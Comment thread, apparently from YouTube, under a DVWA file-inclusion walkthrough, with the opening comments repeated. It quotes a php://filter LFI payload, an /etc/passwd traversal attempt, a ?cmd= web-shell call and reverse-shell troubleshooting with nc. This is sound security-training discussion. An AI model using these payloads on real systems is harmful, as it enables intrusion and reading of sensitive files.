Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources: www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/ highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g. 127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
i have been looking for a way to get the third quote by myself since i wanted to just cat the file with the reverse shell, but im running dvwa in docker and cant easily find php.ini, can't believe i didn't see this comment, great vid btw
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
It's been a long time since I made this *but* I might of used HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
Great video. I'm learning quite a lot. thank you for providing such information for free. For the guys asking about the hidden line 3; we got a reverse shell on the system, you can "cd" to the hackable folder and "cat" the contents of "fi.php" file. That way, you'll read the source code behind the file itself which will expose the hidden line. e.g. $ cat /var/www/html/dvwa/hackable/flags/fi.php of course, this is the full path to the file on my vm. replace the path to match your system setup :)
It's a helpful and great video! Unfortunately, I have some questions when I tried RFI with reverse shell. Is it possible if I want your any contact method?
@@_CryptoCat Oh no! My reply had been disappeared! RUclips...let me write down the comment, please!🥲 OK! Thank you for your reply! I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled. In addition, I could successfully RFI through visiting google page. However my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!". Do you have any idea or suggestion?
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
Quite often I'll just use a really simple shell.php containing: Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami For more web shells: github.com/swisskyrepo/PayloadsAllTheThings For reverse shells, this site is great: www.revshells.com 😉
Wow ! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match exactly yours. In a real world scenario the allow_url_include has to be turned on for this to work right? What if its turned off, do you know of any way to work around this? Thanks
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
Hi mate, I'm not 100% sure but you probably need have the shell connect back to your docker IP address, rather than your VM IP address. If you run docker container with -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
Hey, the local file inclusion doesn't seem to work for me in lwo level. i'm trying this: "?page=../../../../../../etc/passwd" it's not working it only says no such file or directory
@@_CryptoCat Oh yeah, i do tried other files; also i was on windows which was the main cause, i'm currently researching windows file system but if you know the alternate version of etc/passwd for windows you could tell me
Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources:
www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter
book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers
Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g.
127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php
Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
i have been looking for a way to get the third quote by myself since i wanted to just cat the file with the reverse shell, but im running dvwa in docker and cant easily find php.ini, can't believe i didn't see this comment, great vid btw
@@johnstyl thanks mate 🥰
Really grateful for all your DVWA videos!!
This rfi blow my head 🤯🤯 thank you for these videos!
🙏🥰
26:00
It solved my issue.
Thank you.
worked ! thanks alot, just saved me
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
It's been a long time since I made this *but* I might of used HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
@_CryptoCat thank you for explaining!
Great video. I'm learning quite a lot. thank you for providing such information for free.
For the guys asking about the hidden line 3; we got a reverse shell on the system, you can "cd" to the hackable folder and "cat" the contents of "fi.php" file.
That way, you'll read the source code behind the file itself which will expose the hidden line.
e.g.
$ cat /var/www/html/dvwa/hackable/flags/fi.php
of course, this is the full path to the file on my vm. replace the path to match your system setup :)
It's a helpful and great video!
Unfortunately, I have some questions when I tried RFI with reverse shell.
Is it possible if I want your any contact method?
You can ask questions here if you want, they might help other people who watch the video in future 🙂
@@_CryptoCat Oh no! My reply had been disappeared! RUclips...let me write down the comment, please!🥲
OK! Thank you for your reply!
I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled.
In addition, I could successfully RFI through visiting google page.
However my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!".
Do you have any idea or suggestion?
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
@@_CryptoCat Got it! Thank you very much! 🥰
Great walk-through! What about Quote 3, though? It's still hidden.
I was able to go back to the command injection page and display the file, but I can't seem to get it using only the file inclusion.
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
@@gordonrogers8118 just open the fi.php file when you get a shell with RFI
word of advice. never hold the arror key to scroll liek you did in this video, it takes to long. instead do ctrl+A and ctrl+E
Haha yeh these shortcuts save so much time 🙌
Hey where do you get those shellp.php file I tried using msfvenom but i couldn't get any reverse shell :(
Quite often I'll just use a really simple shell.php containing:
Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami
For more web shells: github.com/swisskyrepo/PayloadsAllTheThings
For reverse shells, this site is great: www.revshells.com 😉
@@_CryptoCat Thank youuu I love your videos
@@pennyWise_01 thank you 🙏🥰
The php function allow_url_include is not enable .what i do ?
IIRC the settings were covered in the intro ep, but you could also check the docs.
Tnx for ur reply 🥰. I fix my problem in another way
Thank you @_CryptoCat :)
Wow ! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match exactly yours. In a real world scenario the allow_url_include has to be turned on for this to work right? What if its turned off, do you know of any way to work around this? Thanks
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
@@_CryptoCat thanks brother always learning alot from you
@@Kinoti9 🥰
Hi. I'm running my dvwa as a docker. My shell.php works except for the last part /bin/sh
Any ideas for docker hosted reverse scripts please
🇬🇧
Hi mate, I'm not 100% sure but you probably need have the shell connect back to your docker IP address, rather than your VM IP address. If you run docker container with -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
Hey, the local file inclusion doesn't seem to work for me in lwo level. i'm trying this: "?page=../../../../../../etc/passwd" it's not working it only says no such file or directory
Just to double-check, you are on Linux rather than Windows? Have you tried any other files?
@@_CryptoCat Oh yeah, i do tried other files; also i was on windows which was the main cause, i'm currently researching windows file system but if you know the alternate version of etc/passwd for windows you could tell me
hmm, seems to get a permission denied
@@_CryptoCat managed to find the etc/passwd and managed to install a reverse shell, THIS IS AWESOME!